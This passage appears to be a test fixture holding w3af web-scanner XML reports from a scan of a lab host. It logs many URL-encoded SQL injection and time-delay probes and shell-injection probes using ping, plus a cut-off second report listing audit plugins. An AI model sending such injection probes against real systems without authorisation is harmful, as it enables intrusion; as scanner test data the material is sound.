                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="732">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53%27+OR+%2753%27%3D%2753 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="732">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53%27+OR+%2753%27%3D%2753 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53%27+OR+%2753%27%3D%2753'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="738">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53%27+AND+%2753%27%3D%2754 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="738">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53%27+AND+%2753%27%3D%2754 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53%27+AND+%2753%27%3D%2754'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="749">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/52%27+OR+%2752%27%3D%2752 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="749">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 52%27+OR+%2752%27%3D%2752 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='52%27+OR+%2752%27%3D%2752'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="751">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="751">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="753">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="753">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="754">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/52%27+AND+%2752%27%3D%2753 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="754">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 52%27+AND+%2752%27%3D%2753 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='52%27+AND+%2752%27%3D%2753'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="759">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53+OR+53%3D53+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="759">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53+OR+53%3D53+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53+OR+53%3D53+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="764">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53+AND+53%3D54+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="764">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53+AND+53%3D54+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53+AND+53%3D54+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="771">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="771">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="772">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="772">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="773">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/87+OR+87%3D87+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="773">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 87+OR+87%3D87+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='87+OR+87%3D87+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="777">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/87+AND+87%3D88+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="777">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 87+AND+87%3D88+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='87+AND+87%3D88+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="787">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="787">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+SLEEP%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+SLEEP%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="788">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="788">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="803">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="803">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+SLEEP%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+SLEEP%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="804">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="804">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="819">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="819">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+SLEEP%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+SLEEP%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="820">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="820">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-n+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-n+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="835">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="835">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+pg_sleep%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+pg_sleep%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="836">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="836">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-c+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-c+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="851">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="851">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+pg_sleep%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+pg_sleep%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="852">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="852">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about run+ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='run+ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="864">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="864">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+pg_sleep%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+pg_sleep%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <error caller="threading">audit.rfi plugin needs to be correctly configured to use. Please set valid values for local address (eg. 10.5.2.5) and port (eg. 44449), or use the official w3af site as the target server for remote inclusions. The configuration error is: &quot;Listen address and port need to be configured&quot;</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/&quot;. The exception was: &quot;__str__ returned non-string (type OpenSSLReformattedError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">w3af won't be able to run plugin infrastructure.http_vs_https_dist. It seems that the user running the w3af process has not enough privileges.</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/choucroute&quot;. The exception was: &quot;__str__ returned non-string (type OpenSSLReformattedError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.25:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.25:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/cake&quot;. The exception was: &quot;__str__ returned non-string (type OpenSSLReformattedError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.25:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
</w3afrun>
"""


report_high = r"""<w3afrun start="1432061701" startstr="Tue May 19 20:55:01 2015" xmloutputversion="2.0">
    <w3af-version>w3af - Web Application Attack and Audit Framework
Version: 1.6.45
Revision: unknown
Branch: unknown
Local changes: No
Author: Andres Riancho and the w3af team.</w3af-version>
    <scaninfo target="http://192.168.0.116:31337/">
        <audit>
            <plugin name="file_upload">
                <config parameter="extensions" value="[u'gif', u'html']"/>
            </plugin>
            <plugin name="eval">
                <config parameter="use_time_delay" value="True"/>
                <config parameter="use_echo" value="True"/>
            </plugin>
            <plugin name="un_ssl"/>
            <plugin name="os_commanding"/>
            <plugin name="lfi"/>
            <plugin name="sqli"/>
            <plugin name="preg_replace"/>
            <plugin name="phishing_vector"/>
            <plugin name="generic">
                <config parameter="diff_ratio" value="0.35"/>
            </plugin>
            <plugin name="format_string"/>
            <plugin name="ldapi"/>
            <plugin name="redos"/>
            <plugin name="global_redirect"/>
            <plugin name="xpath"/>
            <plugin name="cors_origin">
                <config parameter="origin_header_value" value="http://w3af.org/"/>
            </plugin>
            <plugin name="htaccess_methods"/>
            <plugin name="dav"/>
            <plugin name="ssi"/>
            <plugin name="csrf"/>
            <plugin name="xss">
                <config parameter="persistent_xss" value="True"/>
            </plugin>
            <plugin name="ssl_certificate">
                <config parameter="minExpireDays" value="30"/>
                <config parameter="caFileName" value="w3af/plugins/audit/ssl_certificate/ca.pem"/>
            </plugin>
            <plugin name="xst"/>
            <plugin name="blind_sqli">
                <config parameter="eq_limit" value="0.9"/>
            </plugin>
            <plugin name="mx_injection"/>
            <plugin name="response_splitting"/>
            <plugin name="rfi">
                <config parameter="listen_address" value=""/>
                <config parameter="listen_port" value="44449"/>
                <config parameter="use_w3af_site" value="True"/>
            </plugin>
            <plugin name="frontpage"/>
        </audit>
        <infrastructure>
            <plugin name="find_vhosts"/>
            <plugin name="afd"/>
            <plugin name="detect_transparent_proxy"/>
            <plugin name="allowed_methods">
                <config parameter="execOneTime" value="True"/>
                <config parameter="reportDavOnly" value="True"/>
            </plugin>
            <plugin name="shared_hosting"/>
            <plugin name="fingerprint_WAF"/>
            <plugin name="server_header"/>
            <plugin name="php_eggs"/>
            <plugin name="favicon_identification"/>
            <plugin name="frontpage_version"/>
            <plugin name="http_vs_https_dist">
                <config parameter="httpPort" value="80"/>
                <config parameter="httpsPort" value="443"/>
            </plugin>
            <plugin name="dns_wildcard"/>
            <plugin name="detect_reverse_proxy"/>
            <plugin name="hmap">
                <config parameter="gen_fingerprint" value="False"/>
            </plugin>
            <plugin name="domain_dot"/>
            <plugin name="fingerprint_os"/>
            <plugin name="server_status"/>
            <plugin name="find_jboss"/>
            <plugin name="halberd"/>
        </infrastructure>
        <bruteforce/>
        <grep>
            <plugin name="symfony">
                <config parameter="override" value="False"/>
            </plugin>
            <plugin name="file_upload"/>
            <plugin name="wsdl_greper"/>
            <plugin name="form_autocomplete"/>
            <plugin name="http_in_body"/>
            <plugin name="svn_users"/>
